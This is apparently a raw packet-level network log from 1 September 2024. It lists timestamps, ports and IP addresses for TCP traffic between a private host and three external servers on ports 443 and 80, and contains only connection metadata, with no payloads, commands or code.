Sep 1, 2024 18:28:01.335782051 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.335913897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.335913897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.335922003 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336124897 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336190939 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.336195946 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336249113 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.336507082 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336575985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.336782932 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336839914 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.336896896 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336934090 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336951971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.336955070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336968899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.336977005 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337018967 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337022066 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337037086 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337044001 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337114096 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337117910 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337135077 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337163925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337168932 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337203026 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337462902 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337498903 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337517023 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337522030 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337553024 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337718964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337750912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337771893 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337775946 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337783098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337800026 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337825060 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.337829113 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.337871075 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338059902 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338093042 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338124037 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338125944 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338134050 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338139057 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338191986 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338543892 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338589907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338619947 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338620901 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338622093 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338627100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338654995 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338673115 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338695049 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338699102 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338702917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.338712931 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.338747025 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.339251995 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.339286089 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.339298964 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.339303017 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.339318991 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.339333057 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.339346886 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.339355946 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.339359045 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.339373112 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.339378119 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.339409113 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.339413881 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.339423895 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.358105898 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.360348940 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.360383034 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.360553980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.360553980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.360559940 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.375083923 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.375214100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.375231028 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.375238895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.375329018 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.469237089 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.502800941 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.626305103 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.626315117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.626414061 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.626413107 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.626424074 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.626471996 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.626478910 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.626513958 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.626562119 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.648375034 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.648375034 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.648396969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.648416996 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.831569910 CEST	56172	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:01.836745024 CEST	80	56172	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:01.836828947 CEST	56172	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:01.836956978 CEST	56172	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:01.836977959 CEST	56172	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:01.841794014 CEST	80	56172	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:01.842394114 CEST	80	56172	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:03.101408958 CEST	80	56172	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:03.102108955 CEST	80	56172	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:03.102174997 CEST	56172	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:03.102219105 CEST	56172	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:03.107192039 CEST	80	56172	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:03.138331890 CEST	56173	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:03.143502951 CEST	80	56173	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:03.143611908 CEST	56173	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:03.143724918 CEST	56173	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:03.143760920 CEST	56173	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:03.148720026 CEST	80	56173	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:03.148890018 CEST	80	56173	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:04.414330959 CEST	80	56173	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:04.415484905 CEST	80	56173	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:04.415568113 CEST	56173	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:04.415633917 CEST	56173	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:04.420516968 CEST	80	56173	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:04.430418968 CEST	56174	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:04.435199976 CEST	80	56174	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:04.435267925 CEST	56174	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:04.435401917 CEST	56174	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:04.435436010 CEST	56174	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:04.440277100 CEST	80	56174	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:04.440340042 CEST	80	56174	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:05.692744970 CEST	80	56174	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:05.693011045 CEST	80	56174	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:05.693161964 CEST	56174	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:05.693207979 CEST	56174	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:05.699542046 CEST	80	56174	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:05.730328083 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:05.735208988 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:05.735295057 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:05.735392094 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:05.735403061 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:05.740438938 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:05.740710020 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.729626894 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.729825020 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.729876041 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.729928970 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.729957104 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.729995012 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.730884075 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.730926037 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.731158972 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.731206894 CEST	56175	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.735852003 CEST	80	56175	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.773726940 CEST	56176	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.778556108 CEST	80	56176	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.778615952 CEST	56176	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.778712034 CEST	56176	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.778728008 CEST	56176	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:07.783513069 CEST	80	56176	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:07.783545017 CEST	80	56176	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:09.062797070 CEST	80	56176	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:09.063316107 CEST	80	56176	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:09.063507080 CEST	56176	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:09.063554049 CEST	56176	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:28:09.068420887 CEST	80	56176	191.191.224.16	192.168.2.4
Sep 1, 2024 18:28:10.597249031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:10.602411985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:10.602488041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:10.609755039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:10.615111113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:11.305438042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:11.305491924 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:11.310904980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:11.315653086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:11.581547022 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:11.581615925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:11.582628965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:11.587743998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:11.818561077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:11.818661928 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:11.818772078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:11.818859100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:11.827385902 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:11.832588911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056324959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056405067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056478977 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.056504011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056541920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.056575060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056585073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056593895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056615114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.056626081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.056922913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056935072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.056971073 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.180893898 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.185730934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.407586098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.410823107 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.750097036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.750139952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:12.754909039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.754961967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.754977942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.754987001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.755249023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.755256891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:12.755264044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.139445066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.139571905 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.418194056 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.423111916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.643959999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.643997908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644009113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644119978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644131899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644145012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.644184113 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.644395113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644440889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644443035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.644452095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644493103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.644545078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644555092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.644589901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.645211935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.645291090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.645370007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.645442009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.730385065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.730534077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.775322914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775336027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775345087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775368929 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.775383949 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.775579929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775594950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775608063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775614023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775616884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.775619984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775633097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.775650978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.775901079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775911093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775921106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775929928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.775943995 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.775959969 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.776114941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.776155949 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.776829958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.776839972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.776849031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.776870966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.776880980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.777615070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.777626038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.777656078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.777666092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.777749062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.777764082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.777776003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.777791023 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.777811050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.777828932 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.777857065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.777868986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.777900934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.777908087 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.778608084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.778654099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.778816938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.778856993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.906410933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906424046 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906434059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906470060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.906486034 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.906594992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906605005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906615019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906625986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906635046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.906646013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.906673908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.906938076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906960964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906971931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906981945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.906990051 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.906992912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907007933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.907043934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907054901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907063961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907073021 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.907073021 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.907107115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.907638073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907649040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907656908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907686949 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.907697916 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.907773018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907787085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907795906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907807112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.907823086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.907850027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.908735037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.908763885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.908780098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.908791065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.908799887 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.908802032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.908828974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.908852100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.908864021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.908874989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.908900976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.908910036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:13.909744978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.909756899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:13.909766912 CEST	80	56177	91.202.233.158	192.168.2.4
